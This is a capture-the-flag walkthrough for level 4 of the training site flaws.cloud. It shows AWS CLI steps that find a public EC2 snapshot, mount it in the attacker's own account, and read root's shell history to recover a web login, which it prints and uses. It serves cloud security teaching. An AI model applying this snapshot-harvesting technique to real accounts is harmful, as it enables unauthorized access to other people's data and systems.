Level 4

A CTF walkthrough for level 4 of Flaws.Cloud

Discovering a Public EC2 Snapshot

In the previous level, we identified the entry point for Level 4 as, 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. Upon navigating to this site, we're prompted for a login.

The previous level also hinted "It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it."

Our cloudfox results didn't contain any info about EC2 snapshots (a reason why we shouldn't rely solely on tools) but we can check ourselves, assuming we have permission to do so as the backup user.

aws --profile flaws ec2 describe-snapshots --query "Snapshots[?contains(OwnerId, '975426262029')]"

        "Description": "",
        "Encrypted": false,
        "OwnerId": "975426262029",
        "Progress": "100%",
        "SnapshotId": "snap-0b49342abd1bdcb89",
        "StartTime": "2017-02-28T01:35:12+00:00",
        "State": "completed",
        "VolumeId": "vol-04f1c039bc13ea950",
        "VolumeSize": 8,
        "Tags": [
                "Key": "Name",
                "Value": "flaws backup 2017.02.27"
        "StorageTier": "standard"

Nice! This is a public snapshot meaning we can load this up in our AWS account and enumerate it.

Enumerating a Public EC2 Snapshot

Creating a Volume from Snapshot

We can quickly create an EC2 Volume from this Snapshot with the following command (or this can be done in the AWS console).

aws --profile dev ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id  snap-0b49342abd1bdcb89

Creating an EC2 and Attaching the Volume

After, we need to spin up an EC2 instance and attach this volume to it. Make sure your instance is in the same availability zone as this volume. In this case, us-west-2a. Also, take note of the "device name".

Mounting the Volume

Connect to your new instance (SSH, SSM, EC2 Instance Connect, etc.).

ssh -i ~/Downloads/tyler-flaws.pem ec2-user@ec2-34-213-130-176.us-west-2.compute.amazonaws.com

We need to mount our volume. Let's search for it.

[ec2-user@ip-172-31-33-199 ~]$ lsblk

xvda      202:0    0   8G  0 disk 
├─xvda1   202:1    0   8G  0 part /
├─xvda127 259:0    0   1M  0 part 
└─xvda128 259:1    0  10M  0 part /boot/efi
xvdb      202:16   0   8G  0 disk 
└─xvdb1   202:17   0   8G  0 part 

As you can see, /dev/sdb isn't shown here. The previous screenshot from the console discusses how "newer linux kernels may rename your devices". Not to worry, we can confirm the right disk with this command.

[ec2-user@ip-172-31-33-199 ~]$ sudo file -s /dev/sdb

/dev/sdb: symbolic link to xvdb

Alright, so we need to mount xvdb and then we can navigate into it.

[ec2-user@ip-172-31-33-199 ~]$ sudo mount /dev/xvdb1 /data
cd /data/

Enumerating the Volume

Eventually, I discovered credentials for the webserver.

[ec2-user@ip-172-31-33-199 data]$ sudo cat root/.bash_history

echo dog | htpasswd -p /etc/nginx/.htpasswd -b flaws
htpasswd -p /etc/nginx/.htpasswd -b flaws dpg
htpasswd -b -p /etc/nginx/.htpasswd flaws dpg
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Let's see if they're still active! We need to navigate back to the website at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ and attempt to login.

Gaining Access to the Server

We're successful and we find the entry point for Level 5!


In Level 4, we discovered a public EC2 snapshot in the account. After creating a volume from this in our account, we attached it to our EC2, enumerated the volume, and discovered credentials for the server. Using these credentials we successfully logged in and discovered Level 5's entry point.

It's important to ensure snapshots are not made public unless there is an intended reason to do so. Additionally, these snapshots shouldn't have sensitive data on them such as credentials since anyone in the world can access public snapshots.

Last updated